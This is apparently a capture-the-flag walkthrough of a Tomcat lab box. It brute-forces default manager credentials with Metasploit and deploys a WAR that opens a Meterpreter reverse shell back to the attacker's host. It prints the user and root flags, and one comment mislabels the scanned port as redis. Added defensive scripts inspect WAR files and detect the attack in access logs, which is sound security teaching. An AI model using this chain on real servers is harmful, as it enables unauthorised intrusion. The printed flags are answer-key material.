root@htb:~$ sudo nmap --script=vuln 10.129.136.9 -p 8080
PORT     STATE SERVICE
8080/tcp open  http-proxy
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-enum:
|   /examples/: Sample scripts
|   /manager/html/upload: Apache Tomcat (401 Unauthorized)
|   /manager/html: Apache Tomcat (401 Unauthorized)
|_  /docs/: Potentially interesting folder
* the --script=vuln option runs scripts that focus specifically on detecting known vulnerabilities in the service running on port 6379 - e.g., weak configurations, or known vulnerabilities in the redis service - if no results are found then the service may be fully patched!
FOOTHOLD
Submit the flag located on the user's desktop and the flag located on the administrator's desktop.
//walk the application
root@htb:~$ BROWSER > http://10.129.136.9:8080
* identified the following
- default tomcat configuration
- Manager App Button leads to a "Basic HTTP Authentication"
- Host Manager Button leads to a "Basic HTTP Authentication"
//
root@htb:~$ msfconsole
[msf] >> search tomcat
64 auxiliary/scanner/http/tomcat_mgr_login . normal No Tomcat Application Manager Login Utility
[msf] >> use 64
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >> show options
...
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >> set RHOSTS 10.129.136.9
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >> run
...
[+] 10.129.136.9:8080 - Login Successful: tomcat:s3cret
...
root@htb:~$ BROWSER > http://10.129.136.9:8080 > Manager App
Username: tomcat
Password: s3cret
* upload a WAR file
- A WAR file is a packaged Java web application. It contains:
HTML/JSP files, Java servlets, Compiled .class files,
Configuration files like web.xml, Static content (CSS, JS, images),
even reverse shells
- WAR files are deployed to Java servlet containers like Tomcat, allowing
apps to run in a browser via HTTP
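The WAR description above can be checked against a real archive: a WAR is just a zip file with a deployment descriptor (WEB-INF/web.xml), so an administrator reviewing what was deployed to a Tomcat manager can enumerate what it packages and which servlets and JSPs become reachable once deployed. The script below is an added example, not code from the writeup or from Tomcat; the sample WAR it builds in memory (file names, the servlet class com.example.HelloServlet, the /hello mapping, the dummy .class and .jar bytes) is constructed for the demonstration.

```python
"""Inspect a WAR file: what it packages and what it exposes once deployed.

Added example (not part of the writeup). The WAR built by build_sample_war()
is constructed in memory; the .class and .jar payloads are dummy bytes.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from collections import Counter

# Constructed deployment descriptor: one servlet mapped to /hello.
SAMPLE_WEB_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet>
    <servlet-name>hello</servlet-name>
    <servlet-class>com.example.HelloServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>hello</servlet-name>
    <url-pattern>/hello</url-pattern>
  </servlet-mapping>
</web-app>
"""

# Entry kinds a reviewer cares about, keyed by file extension.
KINDS = {".jsp": "jsp", ".html": "html", ".class": "class", ".jar": "jar",
         ".xml": "config", ".css": "static", ".js": "static", ".png": "static"}


def build_sample_war() -> bytes:
    """Construct a small WAR (a zip archive) with the typical entry kinds."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("WEB-INF/web.xml", SAMPLE_WEB_XML)
        z.writestr("index.jsp", "<%= new java.util.Date() %>")
        z.writestr("reports/summary.jsp", "<h1>summary</h1>")
        # Dummy class-file bytes (real magic number, no real bytecode).
        z.writestr("WEB-INF/classes/com/example/HelloServlet.class",
                   b"\xca\xfe\xba\xbe" + b"\0" * 16)
        z.writestr("static/style.css", "body { color: #333; }")
        z.writestr("WEB-INF/lib/util.jar", b"PK\x05\x06" + b"\0" * 18)
    return buf.getvalue()


def _local(tag: str) -> str:
    """Strip an XML namespace prefix like {http://...}servlet -> servlet."""
    return tag.rsplit("}", 1)[-1]


def servlet_mappings(web_xml: bytes) -> dict:
    """Map url-pattern -> servlet-class from a web.xml, ignoring namespaces."""
    root = ET.fromstring(web_xml)
    classes, mappings = {}, {}
    for el in root.iter():
        if _local(el.tag) == "servlet":
            fields = {_local(c.tag): (c.text or "").strip() for c in el}
            classes[fields.get("servlet-name")] = fields.get("servlet-class")
    for el in root.iter():
        if _local(el.tag) == "servlet-mapping":
            name, patterns = None, []
            for c in el:
                if _local(c.tag) == "servlet-name":
                    name = (c.text or "").strip()
                elif _local(c.tag) == "url-pattern":
                    patterns.append((c.text or "").strip())
            for p in patterns:
                mappings[p] = classes.get(name)
    return mappings


def inspect_war(war_bytes: bytes) -> dict:
    """Summarise a WAR: entry counts by kind, URL-reachable JSPs, servlet map."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as z:
        names = [n for n in z.namelist() if not n.endswith("/")]
        counts = Counter()
        for n in names:
            base = n.rsplit("/", 1)[-1]
            ext = "." + base.rsplit(".", 1)[-1] if "." in base else ""
            counts[KINDS.get(ext, "other")] += 1
        # Anything under WEB-INF/ is never served directly; JSPs elsewhere are
        # reachable by URL as soon as the container deploys the WAR.
        exposed = sorted(n for n in names
                         if n.endswith(".jsp") and not n.startswith("WEB-INF/"))
        mappings = {}
        if "WEB-INF/web.xml" in names:
            mappings = servlet_mappings(z.read("WEB-INF/web.xml"))
    return {"entries": len(names), "by_kind": dict(counts),
            "exposed_jsps": exposed, "servlet_mappings": mappings}


if __name__ == "__main__":
    for k, v in inspect_war(build_sample_war()).items():
        print(f"{k}: {v}")
```

Point inspect_war at the bytes of any deployed .war (Tomcat keeps them under its webapps directory) to get the same summary; the "exposed_jsps" list is the quickest way to see which server-side pages an upload made reachable.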
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >> search tomcat_mgr
5 exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >> use 5
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> show options
Module options (exploit/multi/http/tomcat_mgr_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword no The password for the specified username
HttpUsername no The username to authenticate as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used)
VHOST no HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 85.9.192.83 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> set HttpPassword s3cret
HttpPassword => s3cret
[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> set HttpUsername tomcat
HttpUsername => tomcat
[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> set RHOSTS 10.129.136.9
RHOSTS => 10.129.136.9
[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> set RPORT 8080
RPORT => 8080
[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> set LHOST 10.10.14.4
LHOST => 10.10.14.4
[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> set LPORT 31337
LPORT => 31337
[msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> exploit
[*] Started reverse TCP handler on 10.10.14.4:31337
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying TBD3o7ivnHSaUWmP...
[*] Executing TBD3o7ivnHSaUWmP...
[*] Undeploying TBD3o7ivnHSaUWmP ...
[*] Undeployed at /manager/html/undeploy
[*] Sending stage (58073 bytes) to 10.129.136.9
[*] Meterpreter session 1 opened (10.10.14.4:31337 -> 10.129.136.9:49192) at 2025-08-03 19:47:40 -0500
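Everything the two modules above did against the manager application lands in Tomcat's access log: a burst of 401s on /manager/html from one address (the login scanner), a 200 with an authenticated user shortly after, a POST to /manager/html/upload (the WAR deployment) and an undeploy seconds later. The script below is an added example, not code from the writeup or from Metasploit or Tomcat, showing the detection logic a defender would run over such a log. It assumes the AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b); the log lines are constructed for the demonstration, with the timing and application name borrowed from the session output above, and the thresholds are assumed values.

```python
"""Flag manager brute force and WAR (un)deployment in Tomcat access logs.

Added example (not part of the writeup). SAMPLE_LOG is constructed; the
thresholds below are assumptions to tune for a real environment.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

BRUTE_THRESHOLD = 5                       # 401s from one IP ...
BRUTE_WINDOW = timedelta(seconds=60)      # ... within this window
REDEPLOY_WINDOW = timedelta(seconds=120)  # deploy followed by undeploy this fast
DEPLOY_PATHS = {"/manager/html/upload", "/manager/text/deploy"}
UNDEPLOY_PATHS = {"/manager/html/undeploy", "/manager/text/undeploy"}

# Constructed log: a login scanner, a success, an upload and a quick undeploy.
SAMPLE_LOG = """\
10.10.14.50 - - [03/Aug/2025:19:46:30 -0500] "GET /docs/ HTTP/1.1" 200 1234
10.10.14.7 - - [03/Aug/2025:19:46:40 -0500] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.4 - - [03/Aug/2025:19:46:58 -0500] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.4 - - [03/Aug/2025:19:46:58 -0500] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.4 - - [03/Aug/2025:19:46:59 -0500] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.4 - - [03/Aug/2025:19:46:59 -0500] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.4 - - [03/Aug/2025:19:47:00 -0500] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.4 - - [03/Aug/2025:19:47:01 -0500] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.4 - tomcat [03/Aug/2025:19:47:05 -0500] "GET /manager/html HTTP/1.1" 200 14253
10.10.14.4 - tomcat [03/Aug/2025:19:47:30 -0500] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=NONCE_PLACEHOLDER HTTP/1.1" 200 15042
10.10.14.4 - tomcat [03/Aug/2025:19:47:41 -0500] "POST /manager/html/undeploy?path=/TBD3o7ivnHSaUWmP&org.apache.catalina.filters.CSRF_NONCE=NONCE_PLACEHOLDER HTTP/1.1" 200 14980
"""


def parse_line(line: str):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    ev["path"] = ev["path"].split("?", 1)[0]  # drop query (CSRF nonce, path=)
    return ev


def detect(lines):
    """Return (alert, ip, user) tuples in the order the events are seen."""
    alerts = []
    failures = defaultdict(list)  # ip -> timestamps of recent 401s on /manager
    brute_reported, success_reported, last_deploy = set(), set(), {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or not ev["path"].startswith("/manager"):
            continue
        ip, ts, path = ev["ip"], ev["ts"], ev["path"]
        if ev["status"] == 401:
            # Keep only failures inside the sliding window, then add this one.
            failures[ip] = [t for t in failures[ip] if ts - t <= BRUTE_WINDOW] + [ts]
            if len(failures[ip]) >= BRUTE_THRESHOLD and ip not in brute_reported:
                brute_reported.add(ip)
                alerts.append(("manager_bruteforce", ip, None))
            continue
        if ev["status"] != 200:
            continue
        # First successful manager request from an IP that was brute forcing.
        if ip in brute_reported and ip not in success_reported:
            success_reported.add(ip)
            alerts.append(("manager_login_after_bruteforce", ip, ev["user"]))
        if path in DEPLOY_PATHS:
            last_deploy[ip] = ts
            alerts.append(("war_deployed", ip, ev["user"]))
        elif (path in UNDEPLOY_PATHS and ip in last_deploy
              and ts - last_deploy[ip] <= REDEPLOY_WINDOW):
            # Deploy-then-undeploy within seconds is typical of automated
            # upload tooling rather than of an administrator.
            alerts.append(("deploy_then_undeploy", ip, ev["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

The single 401 from 10.10.14.7 and the /docs/ request never raise anything; the four alerts all point at the one address that failed repeatedly, then authenticated as tomcat, uploaded a WAR and removed it again. Feed detect() the lines of localhost_access_log.*.txt to run it over a real log.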
(Meterpreter 1)(C:\apache-tomcat-7.0.88) >
C:\apache-tomcat-7.0.88> dir c:\users
06/18/2018 11:31 PM <DIR> Administrator
08/22/2013 06:39 PM <DIR> Public
C:\apache-tomcat-7.0.88> dir c:\users\administrator\Desktop
06/19/2018 07:09 AM <DIR> flags
C:\apache-tomcat-7.0.88>dir c:\users\administrator\desktop\flags
06/19/2018 07:11 AM 88 2 for the price of 1.txt
C:\apache-tomcat-7.0.88>type "c:\users\administrator\desktop\flags\2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00
root.txt
04a8b36e1545a455393d067e772fe90e